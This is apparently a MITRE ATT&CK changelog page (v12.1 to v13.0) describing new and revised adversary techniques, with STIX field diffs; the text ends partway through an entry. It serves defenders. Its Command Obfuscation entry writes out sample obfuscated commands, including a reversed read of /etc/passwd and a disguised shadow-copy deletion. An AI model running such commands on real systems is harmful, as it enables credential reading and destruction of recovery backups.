ATT&CK Changes Between v12.1 and v13.0

Additional formats

ATT&CK Navigator layer files for these changes can be uploaded to ATT&CK Navigator manually.

The JSON file changelog.json contains the machine-readable output used to create this page.

Techniques

enterprise-attack

New Techniques

[T1650] Acquire Access

Current version: 1.0

Description: Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)(Citation: Krebs Access Brokers Fortune 500) In some cases, adversary groups may form partnerships to share compromised systems with each other.(Citation: CISA Karakurt 2022) Footholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., [Web Shell](https://attack.mitre.org/techniques/T1505/003)) or established access via [External Remote Services](https://attack.mitre.org/techniques/T1133). In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.(Citation: Microsoft Ransomware as a Service) By leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers) In some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a [Trusted Relationship](https://attack.mitre.org/techniques/T1199), [Multi-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111), or even [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195). 
**Note:** while this technique is distinct from other behaviors such as [Purchase Technical Data](https://attack.mitre.org/techniques/T1597/002) and [Credentials](https://attack.mitre.org/techniques/T1589/001), they may often be used in conjunction (especially where the acquired foothold requires [Valid Accounts](https://attack.mitre.org/techniques/T1078)).


[T1552.008] Unsecured Credentials: Chat Messages

Current version: 1.0

Description: Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels. Rather than accessing the stored chat logs (i.e., [Credentials In Files](https://attack.mitre.org/techniques/T1552/001)), adversaries may directly access credentials within these services on the user endpoint, through servers hosting the services, or through administrator portals for cloud hosted services. Adversaries may also compromise integration tools like Slack Workflows to automatically search through messages to extract user credentials. These credentials may then be abused to perform follow-on activities such as lateral movement or privilege escalation (Citation: Slack Security Risks).


[T1059.009] Command and Scripting Interpreter: Cloud API

Current version: 1.0

Description: Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules like Azure for PowerShell(Citation: A), or software developer kits (SDKs) available for languages such as [Python](https://attack.mitre.org/techniques/T1059/006). Cloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies. With proper permissions (often via use of credentials such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001) and [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment.


[T1651] Cloud Administration Command

Current version: 1.0

Description: Adversaries may abuse cloud management services to execute commands within virtual machines or hybrid-joined devices. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. Similarly, in Azure AD environments, Microsoft Endpoint Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to the Azure AD.(Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020) If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines or on-premises hybrid-joined devices. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)


[T1021.007] Remote Services: Cloud Services

Current version: 1.0

Description: Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078) that are synchronized with or federated to on-premises user identities. The adversary may then perform management actions or access cloud-hosted resources as the logged-on user. Many enterprises federate centrally managed user identities to cloud services, allowing users to log in with their domain credentials in order to access the cloud control plane. Similarly, adversaries may connect to available cloud services through the web console or through the cloud command line interface (CLI) (e.g., [Cloud API](https://attack.mitre.org/techniques/T1059/009)), using commands such as Connect-AZAccount for Azure PowerShell, Connect-MgGraph for Microsoft Graph PowerShell, and gcloud auth login for the Google Cloud CLI. In some cases, adversaries may be able to authenticate to these services via [Application Access Token](https://attack.mitre.org/techniques/T1550/001) instead of a username and password.


[T1027.010] Obfuscated Files or Information: Command Obfuscation

Current version: 1.0

Description: Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE) For example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing, `^`, `+`, `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.(Citation: RC PowerShell) Many languages support built-in obfuscation in the form of base64 or URL encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement command obfuscation via string splitting (`"Wor"+"d.Application"`), order and casing of characters (`rev <<<'dwssap/cte/ tac'`), globbing (`mkdir -p '/tmp/:&$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June 2017) Adversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\voi\pcw\..\..\Windows\tei\qs\k\..\..\..\system32\erool\..\wbem\wg\je\..\..\wmic.exe shadowcopy delete`).(Citation: Twitter Richard WMIC) Tools such as Invoke-Obfuscation and Invoke-DOSfuscation have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)


[T1652] Device Driver Discovery

Current version: 1.0

Description: Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)). Many OS utilities may provide information about local device drivers, such as `driverquery.exe` and the `EnumDeviceDrivers()` API function on Windows.(Citation: Microsoft Driverquery)(Citation: Microsoft EnumDeviceDrivers) Information about device drivers (as well as associated services, i.e., [System Service Discovery](https://attack.mitre.org/techniques/T1007)) may also be available in the Registry.(Citation: Microsoft Registry Drivers) On Linux/macOS, device drivers (in the form of kernel modules) may be visible within `/dev` or using utilities such as `lsmod` and `modinfo`.(Citation: Linux Kernel Programming)(Citation: lsmod man)(Citation: modinfo man)


[T1567.003] Exfiltration Over Web Service: Exfiltration to Text Storage Sites

Current version: 1.0

Description: Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as pastebin[.]com, are commonly used by developers to share code and other information. Text storage sites are often used to host malicious code for C2 communication (e.g., [Stage Capabilities](https://attack.mitre.org/techniques/T1608)), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec) **Note:** This is distinct from [Exfiltration to Code Repository](https://attack.mitre.org/techniques/T1567/001), which highlights access to code repositories via APIs.


[T1027.011] Obfuscated Files or Information: Fileless Storage

Current version: 1.0

Description: Adversaries may store data in "fileless" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) Similar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage. Adversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored. Some forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\System32\Wbem\Repository`) or Registry (e.g., `%SystemRoot%\System32\Config`) physical files.(Citation: Microsoft Fileless)


[T1583.008] Acquire Infrastructure: Malvertising

Current version: 1.0

Description: Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.(Citation: spamhaus-malvertising) Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites. Adversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad, which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised software.(Citation: Masquerads-Guardio)(Citation: FBI-search) Adversaries’ efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts.(Citation: sentinelone-malvertising) Malvertising may be used to support [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system's web browser.(Citation: BBC-malvertising) Adversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets, then sending victims referred from real ad clicks to malicious pages. This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement.(Citation: Masquerads-Guardio) Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.(Citation: spamhaus-malvertising)


[T1036.008] Masquerading: Masquerade File Type

Current version: 1.0

Description: Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file is 0xFF 0xD8 and the file extension is either `.JPE`, `.JPEG` or `.JPG`. Adversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move their malware without triggering detections. Common non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign. Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor `test.gif`. A user may not know that a file is malicious due to the benign appearance and file extension. Polyglot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malware and malicious capabilities.(Citation: polygot_icedID)


[T1556.008] Modify Authentication Process: Network Provider DLL

Current version: 1.0

Description: Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.(Citation: Network Provider API) During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.(Citation: NPPSPY - Huntress)(Citation: NPPSPY Video)(Citation: NPLogonNotify) Adversaries can configure a malicious network provider DLL to receive credentials from `mpnotify.exe`.(Citation: NPPSPY) Once installed as a credential manager (via the Registry), a malicious DLL can receive and save credentials each time a user logs onto a Windows workstation or domain via the `NPLogonNotify()` function.(Citation: NPLogonNotify) Adversaries may target planting malicious network provider DLLs on systems known to have increased logon activity and/or administrator logon activity, such as servers and domain controllers.(Citation: NPPSPY - Huntress)


[T1562.011] Impair Defenses: Spoof Security Alerting

Current version: 1.0

Description: Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident. Rather than or in addition to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), an adversary can spoof positive affirmations that security tools are continuing to function even after legitimate security tools have been disabled (e.g., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). An adversary can also present a “healthy” system status even after infection. This can be abused to enable further malicious activity by delaying defender responses. For example, adversaries may show a fake Windows Security GUI and tray icon with a “healthy” system status after Windows Defender and other system tools have been disabled.(Citation: BlackBasta)

Major Version Changes

[T1217] Browser Information Discovery

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description:
Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.

Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.

Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.

New Description:
Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)

Browser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.

Specific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles)

Dropped Mitigations:

Details

dictionary_item_added
  x_mitre_attack_spec_version: 3.1.0
  x_mitre_deprecated: False

dictionary_item_removed
  x_mitre_permissions_required: ['User']

values_changed
  modified: 2020-03-26 16:06:07.367000+00:00 → 2023-04-16 14:24:40.625000+00:00
  name: Browser Bookmark Discovery → Browser Information Discovery
  description: Old Description → New Description (both shown above)
  x_mitre_version: 1.0 → 2.0

iterable_item_added
  external_references: {'source_name': 'Chrome Roaming Profiles', 'description': 'Chrome Enterprise and Education Help. (n.d.). Use Chrome Browser with Roaming User Profiles. Retrieved March 28, 2023.', 'url': 'https://support.google.com/chrome/a/answer/7349337'}
  external_references: {'source_name': 'Kaspersky Autofill', 'description': 'Golubev, S. (n.d.). How malware steals autofill data from browsers. Retrieved March 28, 2023.', 'url': 'https://www.kaspersky.com/blog/browser-data-theft/27871/'}
  x_mitre_contributors: Manikantan Srinivasan, NEC Corporation India
  x_mitre_contributors: Yinon Engelsman, Talon Cyber Security
  x_mitre_contributors: Yonatan Gotlib, Talon Cyber Security
  x_mitre_data_sources: Command: Command Execution

iterable_item_removed
  x_mitre_data_sources: Command: Command Execution

Minor Version Changes

[T1548] Abuse Elevation Control Mechanism

Current version: 1.1

Version changed from: 1.0 → 1.1

Details

dictionary_item_added
  x_mitre_attack_spec_version: 3.1.0
  x_mitre_deprecated: False

values_changed
  modified: 2022-03-21 19:01:25.043000+00:00 → 2023-04-21 12:35:07.744000+00:00
  x_mitre_data_sources[0]: Command: Command Execution → File: File Metadata
  x_mitre_data_sources[1]: File: File Modification → Process: OS API Execution
  x_mitre_data_sources[2]: Windows Registry: Windows Registry Key Modification → Process: Process Creation
  x_mitre_data_sources[3]: Process: Process Metadata → Command: Command Execution
  x_mitre_data_sources[4]: Process: Process Creation → Windows Registry: Windows Registry Key Modification
  x_mitre_data_sources[5]: Process: OS API Execution → Process: Process Metadata
  x_mitre_data_sources[6]: File: File Metadata → File: File Modification
  x_mitre_version: 1.0 → 1.1

[T1546.008] Event Triggered Execution: Accessibility Features

Current version: 1.1

Version changed from: 1.0 → 1.1

Details

dictionary_item_added
  x_mitre_attack_spec_version: 3.1.0
  x_mitre_deprecated: False
  external_references: Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub' URI for Fileless Persistence. Retrieved April 28, 2020.

dictionary_item_removed
  external_references: CAPEC-558

values_changed
  modified: 2020-05-13 20:37:30.048000+00:00 → 2023-04-21 12:33:18.602000+00:00
  external_references[1]['source_name']: capec → Narrator Accessibility Abuse
  external_references[1]['url']: https://capec.mitre.org/data/definitions/558.html → https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html
  x_mitre_data_sources[0]: File: File Modification → Command: Command Execution
  x_mitre_data_sources[1]: File: File Creation → Windows Registry: Windows Registry Key Modification
  x_mitre_data_sources[2]: Windows Registry: Windows Registry Key Modification → File: File Modification
  x_mitre_data_sources[4]: Command: Command Execution → File: File Creation
  x_mitre_version: 1.0 → 1.1

iterable_item_removed
  external_references: {'source_name': 'Narrator Accessibility Abuse', 'description': "Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub' URI for Fileless Persistence. Retrieved April 28, 2020.", 'url': 'https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html'}

[T1531] Account Access Removal

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:
Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)

In Windows, [Net](https://attack.mitre.org/software/S0039) utility, `Set-LocalUser` and `Set-ADAccountPassword` [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the `passwd` utility may be used to change passwords. Accounts could also be disabled by Group Policy.

Adversaries who use ransomware may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective.

New Description:
Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)

In Windows, [Net](https://attack.mitre.org/software/S0039) utility, `Set-LocalUser` and `Set-ADAccountPassword` [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the `passwd` utility may be used to change passwords. Accounts could also be disabled by Group Policy.

Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective.

Details

dictionary_item_added
  x_mitre_contributors: ['Hubert Mank']

values_changed
  modified: 2022-04-19 22:57:27.449000+00:00 → 2023-03-22 20:39:15.680000+00:00
  description: Old Description → New Description (both shown above)
  x_mitre_attack_spec_version: 2.1.0 → 3.1.0
  x_mitre_version: 1.1 → 1.2

iterable_item_added
  x_mitre_data_sources: User Account: User Account Modification

iterable_item_removed
  x_mitre_data_sources: User Account: User Account Modification

[T1087] Account Discovery

Current version: 2.4

Version changed from: 2.3 → 2.4


Old Description:
Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.

New Description:
Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.
For examples, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.

Dropped Mitigations:

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
external_references | | Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.
dictionary_item_removed
STIX Field | Old value | New Value
x_mitre_permissions_required | ['User'] |
external_references | CAPEC-575 |
values_changed
STIX Field | Old value | New Value
modified | 2021-10-13 14:05:15.038000+00:00 | 2023-04-15 17:24:23.029000+00:00
description | Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior. | Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)). Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment. For examples, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.
external_references[1]['source_name'] | capec | Elastic - Koadiac Detection with EQL
external_references[1]['url'] | https://capec.mitre.org/data/definitions/575.html | https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql
x_mitre_data_sources[0] | File: File Access | Process: Process Creation
x_mitre_data_sources[2] | Process: Process Creation | File: File Access
x_mitre_version | 2.3 | 2.4
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'Elastic - Koadiac Detection with EQL', 'description': 'Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.', 'url': 'https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql'} |

[T1098] Account Manipulation

Current version: 2.5

Version changed from: 2.4 → 2.5

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-18 15:50:24.811000+00:00 | 2023-04-12 23:29:30.966000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[1] | Group: Group Modification | Command: Command Execution
x_mitre_data_sources[2] | Process: Process Creation | Active Directory: Active Directory Object Modification
x_mitre_data_sources[3] | Active Directory: Active Directory Object Modification | Group: Group Modification
x_mitre_data_sources[4] | Command: Command Execution | File: File Modification
x_mitre_data_sources[5] | File: File Modification | Process: Process Creation
x_mitre_version | 2.4 | 2.5
iterable_item_added
STIX Field | Old value | New Value
x_mitre_platforms | | Network

[T1583] Acquire Infrastructure

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:
Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.
Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.

New Description:
Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.
Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090).(Citation: amnesty_nso_pegasus) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_contributors | | ['Shailesh Tiwary (Indian Army)']
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2021-10-17 15:45:02.209000+00:00 | 2023-03-02 21:34:46.139000+00:00
description | Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase. Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down. | Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase. Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090).(Citation: amnesty_nso_pegasus) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.
external_references[1]['source_name'] | TrendmicroHideoutsLease | amnesty_nso_pegasus
external_references[1]['description'] | Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017. | Amnesty International Security Lab. (2021, July 18). Forensic Methodology Report: How to catch NSO Group’s Pegasus. Retrieved February 22, 2022.
external_references[1]['url'] | https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf | https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/
external_references[2]['source_name'] | ThreatConnect Infrastructure Dec 2020 | Koczwara Beacon Hunting Sep 2021
external_references[2]['description'] | ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021. | Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.
external_references[2]['url'] | https://threatconnect.com/blog/infrastructure-research-hunting/ | https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
external_references[3]['source_name'] | Mandiant SCANdalous Jul 2020 | TrendmicroHideoutsLease
external_references[3]['description'] | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021. | Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017.
external_references[3]['url'] | https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation | https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
external_references[4]['source_name'] | Koczwara Beacon Hunting Sep 2021 | Mandiant SCANdalous Jul 2020
external_references[4]['description'] | Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021. | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.
external_references[4]['url'] | https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2 | https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
x_mitre_data_sources[1] | Domain Name: Domain Registration | Domain Name: Active DNS
x_mitre_data_sources[4] | Domain Name: Active DNS | Domain Name: Domain Registration
x_mitre_version | 1.1 | 1.2
iterable_item_added
STIX Field | Old value | New Value
external_references | | {'source_name': 'ThreatConnect Infrastructure Dec 2020', 'description': 'ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.', 'url': 'https://threatconnect.com/blog/infrastructure-research-hunting/'}

[T1098.001] Account Manipulation: Additional Cloud Credentials

Current version: 2.5

Version changed from: 2.4 → 2.5


Old Description:
Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
